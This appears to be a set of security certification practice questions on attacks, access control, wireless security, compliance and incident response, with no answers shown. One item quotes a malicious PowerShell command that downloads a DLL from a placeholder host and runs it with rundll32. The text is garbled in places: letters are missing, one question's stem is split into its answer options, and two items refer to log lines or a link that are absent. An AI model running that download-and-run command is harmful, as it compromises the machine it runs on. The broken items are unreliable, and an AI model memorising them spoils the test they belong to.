A security analyst discovers that a large number of employee credentials had been stolen and were being sold on the dark web. The analyst investigates and discovers that some hourly employee credentials were compromised, but salaried employee credentials were not affected.
Most employees clocked in and out while they were inside the building using one of the kiosks connected to the network. However, some clocked out and recorded their time after leaving to go home. Only those who clocked in and out while inside the building had credentials stolen. Each of the kiosks are on different floors, and there are multiple routers, since the business segments environments for certain business functions.
Hourly employees are required to use a website called acmetimekeeping.com to clock in and out. This website is accessible from the internet.
Which of the following is the most likely reason for this compromise?

A. A brute-force attack was used against the time-keeping website to scan for common passwords.

B. A malicious actor compromised the time-keeping website with malicious code using an unpatched vulnerability on the site, stealing the credentials.

C. The internal DNS servers were poisoned and were redirecting acmetimekeeping.com to a malicious domain that intercepted the credentials and then passed them through to the real site.

D. ARP poisoning affected the machines in the building and caused the kiosks to send a copy of all the submitted credentials to a malicious machine.

An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users' corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment models is being utilized?

A. MDM and application management

B. BYOD and containers

C. COPE and VDI

D. CYOD and VMs

Which of the following documents provides guidance regarding the recommended deployment of network security systems from the manufacturer?

A. Cloud control matrix

B. Reference architecture

C. NIST RMF

D. CIS Top 20

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

A. AUP

B. NDA

C. SLA

D. MOU

An administrator is investigating an incident and discovers several users' computers were infected with malware after viewing files that were shared with them. The administrator discovers no degraded performance in the infected machines and an examination of the log files does not show excessive failed logins. Which of the following attacks is most likely the cause of the malware?

A. Malicious flash drive

B. Remote access Trojan

C. Brute-forced password

D. Cryptojacking

Which of the following scenarios BEST describes a risk reduction technique?

A. A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches.

B. A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure method of operation.

C. A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations have occurred.

D. A security control objective cannot be met through a technical change, so the Chief Information officer decides to sign off on the risk.

A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

A. DDoS

B. Privilege escalation

C. DNS poisoning

D. Buffer over flow

Which of the following is assured when a user signs an email using a private key?

A. Non-repudiation

B. confidentiality

C. Availability

D. Authentication

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian

B. Data controller

C. Data protection officer

D. Data processor

A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a public registry. Which of the following is the best solution to prevent this type of incident from occurring again?

A. Enforce the use of a controlled trusted source of container images.

B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers.

C. define a vulnerability scan to assess container images before being introduced on the environment.

D. Create a dedicated VPC for the containerized environment.

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?

A. Intelligence fusion

B. Review reports

C. Log reviews

D. Threat feeds

An application owner reports suspicious activity on an internal financial application from various internal users within the past 14 days. A security analyst notices the following:
· Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users. · Internal users in question were changing their passwords frequently during that time period. · A jump box that several domain administrator users use to connect to remote devices was recently compromised.
· The authentication method used in the environment is NTLM.
Which of the following types of attacks is most likely being used to gain unauthorized access?

A. Pass-the-hash

B. Brute-force

C. Directory traversal

D. Replay

An organization wants to participate in threat intelligence information sharing with peer groups. Which of the following would MOST likely meet the organization's requirement?

A. Perform OSINT investigations.

B. Subscribe to threat intelligence feeds.

C. Submit RFCs.

D. Implement a TAXII server.

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:
* Must be able to differentiate between users connected to WiFi
* The encryption keys need to change routinely without interrupting the users or forcing reauthentication
* Must be able to integrate with RADIUS
* Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?

A. WPA2-Enterprise

B. WPA3-PSK

C. 802.11n

D. WPS

A security engineer is reviewing the logs from a SAML application that is configured to use MF

A. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but have been able to log in without doing so. Which of the following statements BEST explains the issue?

B. OpenID is mandatory to make the MFA requirements work.

C. An incorrect browser has been detected by the SAML application.

D. The access device has a trusted certificate installed that is overwriting the session token.

E. The user’s IP address is changing between logins, but the application is not invalidating the token.

Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the email to others?

A. Hoaxing

B. Pharming

C. Watering-hole

D. Phishing

A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking the following:
Which of the following was most likely observed?

A. DLL injection

B. Session replay

C. SQLi

D. XSS

An organization routes all of its traffic through a VPN. Most users are remote and connect into a corporate data center that houses con dential information. There is a firewall at the internet border, followed by a DLP appliance, the VPN server, and the data center itself. Which of the following is the weakest design element?

A. The DLP appliance should be integrated into a NGFW.

B. Split-tunnel connections can negatively impact the DLP appliance’s performance.

C. Encrypted VPN traffic will not be inspected when entering or leaving the network.

D. Adding two hops in the VPN tunnel may slow down remote connections.

A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst to use?

A. SSAE SOC 2

B. ISO 31000

C. NIST CSF

D. GDPR

The Chief Technology officer of a local college would like visitors to utilize the school's Wi-Fi but must be able to associate potential malicious activity to a specific person. Which of the following would best allow this objective to be met?

A. Requiring all new. on-site visitors to configure their devices to use WPS

B. Implementing a new SSID for every event hosted by the college that has visitors

C. Creating a unique PSK for every visitor when they arrive at the reception area

D. Deploying a captive portal to capture visitors’ MAC addresses and names

A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the lowest possible budget. Which of the following would BEST meet the requirements?

A. Preventive controls

B. Compensating controls

C. Deterrent controls

D. Detective controls

A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST solution?

A. HIPS

B. FIM

C. TPM

D. DLP

A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system. Which of the following would detect this behavior?

A. Implementing encryption

B. Monitoring outbound traffic

C. Using default settings

D. Closing all open ports

A company is implementing a vendor's security tool in the cloud. The security director does not want to manage users and passwords specific to this tool but would rather utilize the company's standard user directory. Which of the following should the company implement?

A. 802.1X

B. SAML

C. RADIUS

D. CHAP

Company engineers regularly participate in a public Internet forum with other engineers throughout the industry. Which of the following tactics would an attacker MOST likely use in this scenario?

A. Watering-hole attack

B. Credential harvesting

C. Hybrid warfare

D. Pharming

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process rundl132.exe $env:TEMPautoupdate.dll
Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.

B. A PowerShell code is displaying a picture.

C. A PowerShell code is configuring environmental variables.

D. A PowerShell code is changing Windows Update settings.

Which of the following uses SAML for authentication?

A. TOTP

B. Federation

C. Kerberos

D. HOTP

An employee received multiple messages on a mobile device. The messages were instructing the employee to pair the device to an unknown device. Which of the follow ng best describes what a malicious person might be doing to cause this issue to occur?

A. Jamming

B. Bluesnar ng

C. Evil twin attack

D. Rogue access point

A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company consult?

A. GDPR

B. ISO

C. NIST

D. PCI DSS

A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?

A. Air gap the system.

B. Move the system to a different network segment.

C. Create a change control request.

D. Apply the patch to the system.

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory

B. Rule-based

C. Discretionary

D. Role-based

An organization would like to store customer data on a separate part of the network that is not accessible to users on the mam corporate network. Which of the following should the administrator use to accomplish this goal?

A. Segmentation

B. Isolation

C. Patching

D. Encryption

Which of the following BEST describes the process of documenting who has access to evidence?

A. Order of volatility

B. Chain of custody

C. Non-repudiation

D. Admissibility

A security analyst needs tofficentrally manage credentials and permissions to the company's network devices. The following security requirements must be met:
· All actions performed by the network staff must be logged.
· Per-command permissions must be possible.
· The authentication server and the devices must communicate through TCP.
Which of the following authentication protocols should the analyst choose?

A. Kerberos

B. CHAP

C. TACACS+

D. RADIUS

A security analyst reviews web server logs and notices the following lines:

Which of the following vulnerabilities is the attacker trying to exploit?

A. Token reuse

B. SQLi

C. CSRF

D. XSS

Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?

A. EF x asset value

B. ALE / SLE

C. MTBF x impact

D. SLE x ARO

Which of the following is a targeted attack aimed at compromising users within a specific industry or group?

A. Watering hole

B. Typosquatting

C. Hoax

D. Impersonation

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

A. Cross-site scripting

B. Buffer over flow

C. Jailbreaking

D. Side loading

An external forensics investigator has been hired to investigate a data breach at a large enterprise with numerous assets. It is known that the breach started in the perimeter network and moved to the sensitive information, generating multiple logs as the attacker traversed through the network. Which of the following will best assist with this investigation?

A. Perform a vulnerability scan to identify the weak spots.

B. Use a packet analyzer to investigate the NetFlow traffic.

C. Check the SIEM to review the correlated logs.

D. Require access to the routers to view current sessions.

A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all polls so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched. Which of the following should be done to prevent an attack like this from happening again? (Choose three.)

A. install DLP software to prevent data loss

B. Use the latest version of software

C. Install a SIEM device

D. Implement MDM

E. Implement a screened subnet for the web server

F. Install an endpoint security solution

Which of the following security controls is used to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of possible attacks?

A. Faraday cages

B. Air gap

C. Vaulting

D. Proximity readers

A security analyst reports a company policy violation in a case in which a large amount of sensitive data is being downloaded after hours from various mobile devices to an external site. Upon further investigation, the analyst notices that successful login attempts are being conducted with impossible travel times during the same time periods when the unauthorized downloads are occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP configurations and an overlapping channel. Which of the following attacks is being conducted?

A. Evil twin

B. Jamming

C. DNS poisoning

D. Bluesnar ng

E. DDoS

An organization's Chief Security officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO MOST likely use?

A. An external security assessment

B. A bug bounty program

C. A tabletop exercise

D. A red-team engagement

A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

A. Keylogger

B. Spyware

C. Trojan

D. Ransomware

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?

A. Input validation

B. Dynamic code analysis

C. Fuzzing

D. Manual code review

An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system. Which of the following best describes the actions taken by the organization?

A. Exception

B. Segmentation

C. Risk transfer

D. Compensating controls

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

A. S/MIME

B. LDAPS

C. SSH

D. SRTP

An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up message reveals that a payment card number was found in the file, and the file upload was blocked. Which of the following controls is most likely causing this issue and should be checked FIRST?

A. DLP

B. Firewall rule

C. Content filter

D. MDM

E. Application allow list

During a recent incident, an external attacker was able to exploit an SMB vulnerability over the internet. Which of the following action items should a security analyst perform FIRST to prevent this from occurring again?

A. Check for any recent SMB CVEs.

B. Install AV on the affected server.

C. Block unneeded TCP 445 connections.

D. Deploy a NIDS in the affected subnet.

A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

A. Continuous deployment

B. Continuous integration

C. Data owners

D. Data processor